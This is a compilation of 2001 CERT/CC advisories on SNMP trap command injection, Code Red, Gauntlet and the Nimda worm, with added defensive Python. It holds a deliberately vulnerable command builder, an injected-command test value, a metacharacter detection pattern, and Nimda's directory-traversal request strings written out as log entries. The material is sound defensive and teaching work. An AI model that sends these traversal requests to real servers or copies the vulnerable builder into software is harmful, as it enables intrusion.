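# Characters that turn varbind *data* into shell *syntax* once the command
# line is handed to /bin/sh.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\\'\"]")


def build_shell_command(template: str, varbinds: Dict[str, str]) -> str:
    """Vulnerable pattern: textual substitution into one string that a shell
    then re-parses, so a string or opaque varbind can smuggle in a command."""
    return PLACEHOLDER.sub(lambda m: varbinds.get(m.group(1), ""), template)


def build_argv(template: str, varbinds: Dict[str, str]) -> List[str]:
    """Hardened pattern: tokenize the template first, then substitute each
    varbind inside its own token, so a value is always exactly one argv
    element and is never parsed by a shell."""
    return [
        PLACEHOLDER.sub(lambda m: varbinds.get(m.group(1), ""), token)
        for token in shlex.split(template)
    ]


def unsafe_varbinds(varbinds: Dict[str, str]) -> List[str]:
    """For configurations that must keep a shell template: the names of the
    varbinds whose value contains shell metacharacters and should be
    rejected before any action is run."""
    return sorted(k for k, v in varbinds.items() if SHELL_META.search(v))


# Constructed trap: varbind 1 is a node name, varbind 2 a free-text
# description into which a command separator has been placed.
TRAP = {"1": "router7", "2": "link down; echo injected"}
TEMPLATE = "logger -t nnm $1 $2"
```

With TEMPLATE and TRAP above, build_shell_command yields a line a shell would run as two commands, while build_argv keeps the second varbind as a single argument to logger.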
If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Apple

   Mac OS X and Mac OS X Server do not have this vulnerability.

Computer Associates

   Computer Associates has completed a review of all Unicenter functions and processing related to SNMP traps as indicated by the advisory. Unicenter is not subject to the same vulnerabilities as demonstrated by the SNMP trap managers identified by CERT (i.e., OpenView and NetView). CA Unicenter does not formulate commands determined through trap data parsing. Unicenter implements this technology using different methods and thereby avoids this exposure. Computer Associates maintains strong relationships with these vendors and recommends that clients running any environments containing either of these products visit the website URLs specifically identified by the CERT Coordination Center.

FreeBSD

   FreeBSD does not use this code.

Fujitsu

   Regarding VU#952171, Fujitsu's UXP/V operating system is not affected because there's no implementation of any OpenView Technology in UXP/V.

Hewlett-Packard

   On June 21, 2001, HP released a security bulletin (HP SB #154) and a patch for this vulnerability in OpenView version 6.1. For more information, see
   http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985
   http://www.kb.cert.org/vuls/id/952171

Microsoft

   NNM is a third-party application as far as our platform is concerned. We don't have any special relationship with it. HP would need to provide the patches.

Tivoli

   Tivoli acknowledges that certain user customizations to Tivoli NetView may lead to a potential security exposure.
   Please reference http://www.tivoli.com/support/ for further information and to obtain an e-fix which addresses the issue.

References

   1. http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985
   2. http://www.tivoli.com/support/
   3. http://www.securityfocus.com/bid/2845
   4. http://www.kb.cert.org/vuls/id/952171
_________________________________________________________________

The CERT Coordination Center thanks Milo G. van der Zee for notifying us about this problem, and Tivoli and Hewlett-Packard for other information used in the construction of this advisory.
_________________________________________________________________

Feedback on this document can be directed to the authors, Jason A. Rafail and Shawn Hernan.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-24.html
______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
   CERT Coordination Center
   Software Engineering Institute
   Carnegie Mellon University
   Pittsburgh PA 15213-3890
   U.S.A.

CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org.
Please include in the body of your message

   subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

Revision History

August 15, 2001: Initial release

From - Tue Aug 28 10:11:27 2001
Date: Tue, 28 Aug 2001 11:12:26 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Summary CS-2001-03

CERT Summary CS-2001-03

August 28, 2001

Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.

Past CERT summaries are available from:

   CERT Summaries
   http://www.cert.org/summaries/
______________________________________________________________________

Recent Activity

Since the last regularly scheduled CERT summary, issued in May 2001 (CS-2001-02), we have seen several self-propagating worms, as well as active exploitation of vulnerabilities in Solaris in.lpd, the BSD telnet daemon and Microsoft IIS by intruders. In addition, we have seen an increase in intruder activity directed at home users.

For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.

   CERT/CC Current Activity
   http://www.cert.org/current/current_activity.html

1. "Code Red" / "Code Red II" worms

On June 19, 2001, the CERT/CC published CERT Advisory CA-2001-13, describing a vulnerability in Indexing Services used by Microsoft IIS 4.0 and IIS 5.0 running on Windows NT, Windows 2000, and beta versions of Windows XP. This vulnerability allows a remote intruder to run arbitrary code on the victim machine.

On July 19, 2001, the CERT/CC began receiving a large number of reports of a worm commonly referred to as "Code Red". The widespread, automated attack and propagation characteristics of this worm, and its variants, have caused bandwidth denial-of-service conditions in isolated portions of the Internet, particularly near groups of compromised hosts. Since that time, we have received reports of variants, as well as reports of another worm with similar characteristics (Code Red II). These worms have affected at least 300,000 hosts. The CERT/CC highly encourages administrators of IIS servers to review the following documents and take appropriate action.

   CERT Advisory CA-2001-13: Buffer Overflow In IIS Indexing Service DLL
   http://www.cert.org/advisories/CA-2001-13.html

   CERT Advisory CA-2001-19: "Code Red" Worm Exploiting Buffer Overflow in IIS Indexing Service DLL
   http://www.cert.org/advisories/CA-2001-19.html

   CERT Advisory CA-2001-23: Continuing Threat of the "Code Red" Worm
   http://www.cert.org/advisories/CA-2001-23.html

   CERT Incident Note IN-2001-08: "Code Red" Worm Exploiting Buffer Overflow in IIS Indexing Service DLL
   http://www.cert.org/incident_notes/IN-2001-08.html

   CERT Incident Note IN-2001-09: "Code Red II:" Another Worm Exploiting Buffer Overflow in IIS Indexing Service DLL
   http://www.cert.org/incident_notes/IN-2001-09.html

2. "Code Red" Worm Crashes IIS 4.0 Servers with URL Redirection Enabled

Along with the large number of "Code Red" and "Code Red II" reports indicating that systems are compromised, the CERT/CC has received a smaller yet still significant number of reports where Windows NT 4.0 IIS 4.0 systems have been adversely affected by the high volume of "Code Red" scanning activity. A recently discovered vulnerability can cause an IIS 4.0 server (patched against "Code Red" according to Microsoft Security Bulletin MS01-033) with URL redirection enabled to crash when scanned by the "Code Red" worm.

   CERT Incident Note IN-2001-10: "Code Red" Worm Crashes IIS 4.0 Servers with URL Redirection Enabled
   http://www.cert.org/incident_notes/IN-2001-10.html

3. W32/Sircam Malicious Code

"W32/Sircam" is malicious code that spreads through email and potentially through unprotected Windows network shares. Once the malicious code has been executed on a system, it may reveal or delete sensitive information. Detailed information about W32/Sircam can be found in CERT Advisory CA-2001-22. Users are strongly encouraged to visit their anti-virus vendor's website for information on how to properly remove W32/Sircam from an infected computer.

   CERT Advisory CA-2001-22: W32/Sircam Malicious Code
   http://www.cert.org/advisories/CA-2001-22.html

4. Buffer Overflow in telnetd

The telnetd program is a server for the Telnet remote virtual terminal protocol. There is a remotely exploitable buffer overflow in Telnet daemons derived from BSD source code. This vulnerability can crash the server or be leveraged to gain root access.

   CERT Advisory CA-2001-21: Buffer Overflow in telnetd
   http://www.cert.org/advisories/CA-2001-21.html

5. Buffer Overflow in Sun Solaris in.lpd Print Daemon

A buffer overflow exists in the Solaris BSD-style line printer daemon, in.lpd, that may allow a remote intruder to execute arbitrary code with the privileges of the running daemon.
   CERT Advisory CA-2001-15: Buffer Overflow in Sun Solaris in.lpd Print Daemon
   http://www.cert.org/advisories/CA-2001-15.html

6. Continuing Threats to Home Users

The CERT/CC has observed a significant increase in activity resulting in compromises of home user machines. Many home users do not keep their machines up to date with security patches and workarounds, do not run current anti-virus software, and do not exercise caution when handling email attachments. Intruders know this, and we have seen a marked increase in intruders specifically targeting home users who have cable modem and DSL connections. The CERT/CC strongly encourages home users to review the documents referenced below. These documents illustrate the threats to home users, and outline countermeasures that can be used to mitigate against them.

   CERT Advisory CA-2001-20: Continuing Threats to Home Users
   http://www.cert.org/advisories/CA-2001-20.html

   CERT Tech Tip: Home Network Security
   http://www.cert.org/tech_tips/home_networks.html

7. W32/Leaves

The CERT/CC has received a number of reports regarding the compromise of home user machines running Microsoft Windows. Most of these reports surround the intruder tool SubSeven. SubSeven is often used as a Trojan horse, which allows an intruder to deliver and execute any custom payload and run arbitrary commands on the affected machine.
   CERT Incident Note IN-2001-07: W32/Leaves: Exploitation of previously installed SubSeven Trojan Horses
   http://www.cert.org/incident_notes/IN-2001-07.html
_________________________________________________________________

What's New and Updated

Since the last CERT Summary, we have published new and updated

   * Advisories
     http://www.cert.org/advisories/
   * Congressional Testimony
     http://www.cert.org/congressional_testimony/
   * Incident Notes
     http://www.cert.org/incident_notes/
   * CERT/CC Statistics
     http://www.cert.org/stats/cert_stats.html
   * Tech Tips
     http://www.cert.org/tech_tips/
   * Training Schedule
     http://www.cert.org/training/
______________________________________________________________________

This document is available from:
http://www.cert.org/summaries/CS-2001-03.html
From - Thu Sep 6 18:47:41 2001
Date: Thu, 6 Sep 2001 19:36:13 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-25

CERT Advisory CA-2001-25 Buffer Overflow in Gauntlet Firewall allows intruders to execute arbitrary code

Original release date: September 06, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

   * Systems running the following products that use Gauntlet Firewall
        * Gauntlet for Unix versions 5.x
        * PGP e-ppliance 300 series version 1.0
        * McAfee e-ppliance 100 and 120 series
        * Gauntlet for Unix version 6.0
        * PGP e-ppliance 300 series versions 1.5, 2.0
        * PGP e-ppliance 1000 series versions 1.5, 2.0
        * McAfee WebShield for Solaris v4.1

Overview

A remotely exploitable buffer overflow exists in Gauntlet Firewall by PGP Security.

I. Description

The buffer overflow occurs in the smap/smapd and CSMAP daemons. According to PGP Security, these daemons are responsible for handling email transactions for both inbound and outbound email.

On September 04, 2001, PGP Security released a security bulletin and patches for this vulnerability. For more information, please see

   http://www.pgp.com/support/product-advisories/csmap.asp
   http://www.pgp.com/naicommon/download/upgrade/upgrades-patch.asp
   http://www.kb.cert.org/vuls/id/206723

II. Impact

An intruder can execute arbitrary code with the privileges of the corresponding daemon. Additionally, firewalls often have trust relationships with other network devices. An intruder who compromises a firewall may be able to leverage this trust to compromise other devices on the network or to make changes to the network configuration.
III. Solution

Apply a patch

Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive more information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Network Associates, Inc.

   PGP Security has published a security advisory describing this vulnerability as well as patches. This is available from
   http://www.pgp.com/support/product-advisories/csmap.asp
   http://www.pgp.com/naicommon/download/upgrade/upgrades-patch.asp

References

   1. http://www.pgp.com/support/product-advisories/csmap.asp
   2. http://www.pgp.com/naicommon/download/upgrade/upgrades-patch.asp
   3. http://www.kb.cert.org/vuls/id/206723
_________________________________________________________________

The CERT Coordination Center thanks PGP Security for their advisory, on which this document is based.
_________________________________________________________________

Feedback on this document can be directed to the author, Ian A. Finlay.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-25.html
Revision History

September 06, 2001: Initial release

From - Tue Sep 18 18:40:51 2001
Date: Tue, 18 Sep 2001 19:33:41 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-26

CERT Advisory CA-2001-26 Nimda Worm

Original release date: September 18, 2001
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

   * Systems running Microsoft Windows 95, 98, ME, NT, and 2000

Overview

The CERT/CC has received reports of new malicious code known as the "W32/Nimda worm" or the "Concept Virus (CV) v.5." This new worm appears to spread by multiple mechanisms:

   * from client to client via email
   * from client to client via open network shares
   * from web server to client via browsing of compromised web sites
   * from client to web server via active scanning for and exploitation of the "Microsoft IIS 4.0 / 5.0 directory traversal" vulnerability (VU #111677)
   * from client to web server via scanning for the back doors left behind by the "Code Red II" (IN-2001-09), and "sadmind/IIS" (CA-2001-11) worms

Initial analysis indicates that the worm contains no destructive payload beyond modification of web content to facilitate its own propagation. We are also receiving reports of denial of service as a result of network scanning and email propagation.

I. Description

The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and servers running Windows NT and 2000.

Email Propagation

This worm propagates through email arriving as a MIME "multipart/alternative" message consisting of two sections. The first section is defined as MIME type "text/html", but it contains no text, so the email appears to have no content.
The second section is defined as MIME type "audio/x-wav", but it contains a base64-encoded attachment named "readme.exe", which is a binary executable.

Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as a result, infects the machine with the worm. Thus, in vulnerable configurations, the worm payload will automatically be triggered by simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running the attachment.

The email message delivering the Nimda worm appears to also have the following characteristics:

   * The text in the subject line of the mail message appears to be variable, but those seen to date have been over 80 characters long.
   * There appear to be many slight variations in the attached binary file, causing the MD5 checksum to differ when one compares attachments from different email messages. However, the file length of the attachment appears to consistently be 57344 bytes.

Payload

Infected client machines attempt to send copies of the Nimda worm via email to all addresses found in the Windows address book. Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit the IIS Directory Traversal vulnerability (VU #111677).
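A mail-gateway check for the message layout described above under Email Propagation, as an added example that is not part of the advisory: it flags the empty text/html alternative, an audio/x-wav part whose base64 body decodes to a DOS/PE executable, the executable attachment name, the 57344-byte length and the over-80-character subject. The sample messages and the dummy MZ-headed payload are constructed here.

```python
"""Gateway-side check for the Nimda mail layout described in CA-2001-26.

Added example (not CERT/CC code): flags a multipart/alternative message whose
first alternative is an empty text/html part and whose second part is declared
as audio/x-wav but carries a base64-encoded executable. The sample messages
are constructed here; the "attachment" is a dummy MZ header padded with zeros.
"""
import base64
import email
from email import policy
from typing import List

EXECUTABLE_EXTENSIONS = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs")
REPORTED_ATTACHMENT_LENGTH = 57344  # size the advisory reports for readme.exe


def nimda_indicators(raw: bytes) -> List[str]:
    """Return the structural indicators found in one raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings: List[str] = []
    # Subject lines seen to date were over 80 characters long.
    if len(msg.get("Subject", "") or "") > 80:
        findings.append("long-subject")
    if msg.get_content_type() != "multipart/alternative":
        return findings
    parts = list(msg.iter_parts())
    # The first alternative is text/html with no text, so the mail looks empty.
    if parts and parts[0].get_content_type() == "text/html":
        if not (parts[0].get_payload(decode=True) or b"").strip():
            findings.append("empty-html-alternative")
    for part in parts[1:]:
        ctype = part.get_content_type()
        filename = (part.get_filename() or "").lower()
        if part.get("Content-Transfer-Encoding", "").lower() != "base64":
            continue
        payload = part.get_payload(decode=True) or b""
        # Declared as audio, but the decoded bytes start with a DOS/PE header.
        if ctype.startswith("audio/") and payload[:2] == b"MZ":
            findings.append("executable-disguised-as-" + ctype)
        if filename.endswith(EXECUTABLE_EXTENSIONS):
            findings.append("executable-attachment:" + filename)
        if len(payload) == REPORTED_ATTACHMENT_LENGTH:
            findings.append("attachment-length-57344")
    return findings


def build_sample(malicious: bool) -> bytes:
    """Constructed message in the layout the advisory describes (dummy payload)."""
    if malicious:
        subject = "x" * 85                      # over 80 characters
        html = ""                               # empty text/html alternative
        name = "readme.exe"
        payload = b"MZ" + b"\0" * (REPORTED_ATTACHMENT_LENGTH - 2)
    else:
        subject = "weekly status"
        html = "<p>See the attached clip.</p>"
        name = "clip.wav"
        payload = b"RIFF" + b"\0" * 60
    body = base64.encodebytes(payload).decode("ascii")
    text = (
        "From: sender@example.invalid\n"
        "To: user@example.invalid\n"
        f"Subject: {subject}\n"
        "MIME-Version: 1.0\n"
        'Content-Type: multipart/alternative; boundary="b1"\n'
        "\n"
        "--b1\n"
        "Content-Type: text/html; charset=us-ascii\n"
        "\n"
        f"{html}\n"
        "--b1\n"
        f'Content-Type: audio/x-wav; name="{name}"\n'
        "Content-Transfer-Encoding: base64\n"
        "\n"
        f"{body}"
        "--b1--\n"
    )
    return text.encode("ascii")
```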
The selection of potential target IP addresses follows these rough probabilities:

   * 50% of the time, an address with the same first two octets will be chosen
   * 25% of the time, an address with the same first octet will be chosen
   * 25% of the time, a random address will be chosen

The infected client machine transfers a copy of the Nimda code to any server that it scans and finds to be vulnerable. Once running on the server machine, the worm traverses each directory in the system (including all those accessible through file shares) and writes a copy of itself to disk using the name "README.EML". When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of JavaScript code is appended to every one of these web-related files:

This modification of web content allows further propagation of the worm to new clients through a browser or browsing of a network file system.

Browser Propagation

As part of the infection process, the Nimda worm modifies all web content files it finds (including, but not limited to, files with .htm, .html, and .asp extensions). As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby infecting the browsing system.

File System Propagation

The Nimda worm creates numerous copies of itself (using the name README.EML) in all writable directories (including those found on a network share) to which the user has access. If a user on another system subsequently selects the copy of the worm file on the shared network drive in Windows Explorer with the preview option enabled, the worm may be able to compromise that system.
System FootPrint

The scanning activity of the Nimda worm produces the following log entries for any web server listening on port 80/tcp:

   GET /scripts/root.exe?/c+dir
   GET /MSADC/root.exe?/c+dir
   GET /c/winnt/system32/cmd.exe?/c+dir
   GET /d/winnt/system32/cmd.exe?/c+dir
   GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
   GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
   GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
   GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
   GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
   GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
   GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
   GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
   GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
   GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
   GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
   GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.

II. Impact

Intruders can execute arbitrary commands within the LocalSystem security context on machines running the unpatched versions of IIS. Hosts that have been compromised are also at high risk for being party to attacks on other Internet sites. The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines.
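The log entries above can be triaged automatically once the encoded path forms are normalised. This added example (not CERT/CC code) does that, collapsing the %5c/%2f escapes and the overlong UTF-8 sequences such as \xc0\xaf and \xc1\x9c to ordinary separators, and then separates the four Code Red II back-door probes from the directory-traversal attempts; the sample log is constructed from the advisory's list, with one double-encoded %255c form added as a case beyond the page's list.

```python
"""Classifier for the Nimda scanning footprint listed above.

Added example (not CERT/CC code): normalises the request path the way a
lenient IIS decoder of that era did (percent-decoding applied twice, then
overlong two-byte UTF-8 sequences such as \\xc0\\xaf and \\xc1\\x9c collapsed
to '/' and '\\'), then separates the four Code Red II back-door probes from
the directory-traversal attempts. The log lines below are constructed from
the advisory's list; one double-encoded form (%255c) is added as an extra case.
"""
import re
from collections import Counter
from typing import Dict, Iterable
from urllib.parse import unquote

# Probes for the back door left by Code Red II: root.exe copies and the
# /c and /d virtual directories that map onto the system drives.
BACKDOOR = re.compile(r"^/(scripts|msadc)/root\.exe$|^/[a-z]/winnt/system32/cmd\.exe$", re.I)
# Any ".." immediately before a separator once the path is normalised.
TRAVERSAL = re.compile(r"\.\./")
# The advisory prints raw high bytes as \xHH escapes.
ESCAPED_BYTE = re.compile(r"\\x([0-9a-fA-F]{2})")


def normalize_path(raw: str) -> str:
    """Reduce the encoded forms seen in the logs to one canonical path."""
    data = ESCAPED_BYTE.sub(lambda m: chr(int(m.group(1), 16)), raw)
    # Percent-decode twice so %255c (-> %5c -> \) is caught as well as %5c.
    for _ in range(2):
        data = unquote(data, encoding="latin-1")
    # Lenient overlong UTF-8: a 0xC0/0xC1 lead byte combined with the low six
    # bits of the next byte, which is how \xc0\xaf became '/' and \xc1\x9c
    # became '\' on an unpatched server.
    out, i = [], 0
    while i < len(data):
        c = ord(data[i])
        if c in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(chr(((c & 0x1F) << 6) | (ord(data[i + 1]) & 0x3F)))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return "".join(out).replace("\\", "/")


def classify_request(entry: str) -> str:
    """Classify one 'METHOD /path?query' log entry."""
    _, _, target = entry.strip().partition(" ")
    path = normalize_path(target.split("?", 1)[0])
    if BACKDOOR.search(path):
        return "codered2-backdoor"
    if TRAVERSAL.search(path):
        return "directory-traversal"
    return "benign"


def scan_log(entries: Iterable[str]) -> Dict[str, int]:
    """Count each class over a sequence of log entries."""
    return dict(Counter(classify_request(e) for e in entries))


# Constructed sample: the advisory's sixteen probes, one double-encoded
# variant (not in the advisory), and two ordinary requests.
SAMPLE_LOG = [
    "GET /scripts/root.exe?/c+dir",
    "GET /MSADC/root.exe?/c+dir",
    "GET /c/winnt/system32/cmd.exe?/c+dir",
    "GET /d/winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir",
    "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir",
    "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir",
    r"GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir",
    r"GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir",
    r"GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir",
    r"GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir",
    r"GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir",  # added double-encoded case
    "GET /index.html",
    "GET /images/logo.gif",
]
```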
Solutions

Recommendations for System Administrators of IIS machines

   To determine if your system has been compromised, look for the following:

   * root.exe artifact (indicates a compromise by Code Red II or the sadmind/IIS worm, which leaves the system open to the Nimda worm)
   * admin.dll artifact or unexpected .eml files in the directories with web content (indicates compromise by the Nimda worm)

   The only safe way to recover from the system compromise is to format the system drive(s) and reinstall the system software from trusted media (such as a vendor-supplied CD-ROM). Additionally, after the software is reinstalled, all vendor-supplied security patches must be applied. The recommended time to do this is while the system is not connected to any network. However, if sufficient care is taken to disable all server network services, then the patches can be downloaded from the Internet. Detailed instructions for recovering your system can be found in the CERT/CC tech tip:

     Steps for Recovering from a UNIX or NT System Compromise
     http://www.cert.org/tech_tips/win-UNIX-system_compromise.html

Apply the appropriate patch from your vendor

   A cumulative patch which addresses all of the IIS-related vulnerabilities exploited by the Nimda worm is available from Microsoft at
     http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

Recommendations for End User Systems

Apply the appropriate patch from your vendor

   If you are running a vulnerable version of Internet Explorer (IE), the CERT/CC recommends applying the patch for the "Automatic Execution of Embedded MIME Types" vulnerability available from Microsoft at
     http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

Run and Maintain an Anti-Virus Product

   It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information, tools, or virus databases to help detect and partially recover from this malicious code.
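   The following script is an added example, not part of the advisory, that turns the artifact checklist above into a filesystem sweep: root.exe anywhere, admin.dll anywhere, README.EML anywhere (the worm writes it to every writable directory), and any other .eml file sitting in a directory that also holds .htm/.html/.asp content. The demo tree it builds is constructed to look like an infected IIS host and is not a real capture; the function names are the author's. Finding a hit confirms the compromise but does not replace the rebuild from trusted media the advisory requires.

```python
import os
import tempfile
from pathlib import Path

WEB_CONTENT_EXT = {".htm", ".html", ".asp"}


def find_compromise_artifacts(root):
    """Walk `root` and return sorted (path, reason) tuples for the indicators
    the advisory names. Matching is case-insensitive because NTFS is."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        has_web_content = any(Path(f).suffix.lower() in WEB_CONTENT_EXT for f in files)
        for name in files:
            lc = name.lower()
            full = os.path.join(dirpath, name)
            if lc == "root.exe":
                hits.append((full, "root.exe: backdoor left by Code Red II or the sadmind/IIS worm"))
            elif lc == "admin.dll":
                hits.append((full, "admin.dll: Nimda"))
            elif lc == "readme.eml":
                hits.append((full, "README.EML: Nimda copy written to a writable directory"))
            elif lc.endswith(".eml") and has_web_content:
                hits.append((full, "unexpected .eml beside web content: possible Nimda drop"))
    return sorted(hits)


def build_demo_tree():
    """Create a constructed directory tree mimicking an infected IIS host and
    return its root. Sample data only; the file contents are placeholders."""
    root = tempfile.mkdtemp(prefix="nimda-demo-")
    layout = {
        "inetpub/scripts/root.exe": b"MZ",
        "inetpub/wwwroot/index.html": b"<html></html>",
        "inetpub/wwwroot/README.EML": b"MIME-Version: 1.0",
        "inetpub/wwwroot/images/README.EML": b"MIME-Version: 1.0",  # no web content here, caught by name
        "winnt/system32/admin.dll": b"MZ",
        "users/bob/notes.eml": b"From: bob",  # ordinary mail file, no web content: not flagged
    }
    for rel, data in layout.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
    return root


if __name__ == "__main__":
    # On a real host pass the drive root, e.g. find_compromise_artifacts("C:\\").
    for path, reason in find_compromise_artifacts(build_demo_tree()):
        print(f"{reason:<60} {path}")
```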
   A list of vendor-specific anti-virus information can be found in Appendix A. Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.

Don't open e-mail attachments

   The Nimda worm may arrive as an email attachment named "readme.exe". Users should not open this attachment.

Disable JavaScript

   End-user systems can become infected with the Nimda worm by browsing web sites hosted by infected servers. This method of infection requires the use of JavaScript to be successful. Therefore, the CERT/CC recommends that end user systems disable JavaScript.

Appendix A. Vendor Information

Antivirus Vendor Information

   Central Command, Inc.
     http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?p_refno=010918-000005

   Command Software Systems
     http://www.commandsoftware.com/virus/nimda.html

   Data Fellows Corp
     http://www.datafellows.com/v-descs/nimda.shtml

   McAfee
     http://vil.mcafee.com/dispVirus.asp?virus_k=99209&

   Sophos
     http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

   Symantec
     http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

   Trend Micro
     http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
     http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A

   You may wish to visit the CERT/CC's computer virus resources page located at
     http://www.cert.org/other_sources/viruses.html

   Authors: Roman Danyliw, Chad Dougherty, Allen Householder, Robin Ruefle
______________________________________________________________________
   This document is available from:
   http://www.cert.org/body/advisories/CA200126_FA200126.html
______________________________________________________________________
CERT/CC Contact Information

   Email: cert@cert.org
   Phone: +1 412-268-7090 (24-hour hotline)
   Fax: +1 412-268-6989
   Postal address:
     CERT Coordination Center
     Software Engineering Institute
     Carnegie Mellon University
     Pittsburgh PA 15213-3890
     U.S.A.
   CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

   We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
     http://www.cert.org/CERT_PGP.key
   If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

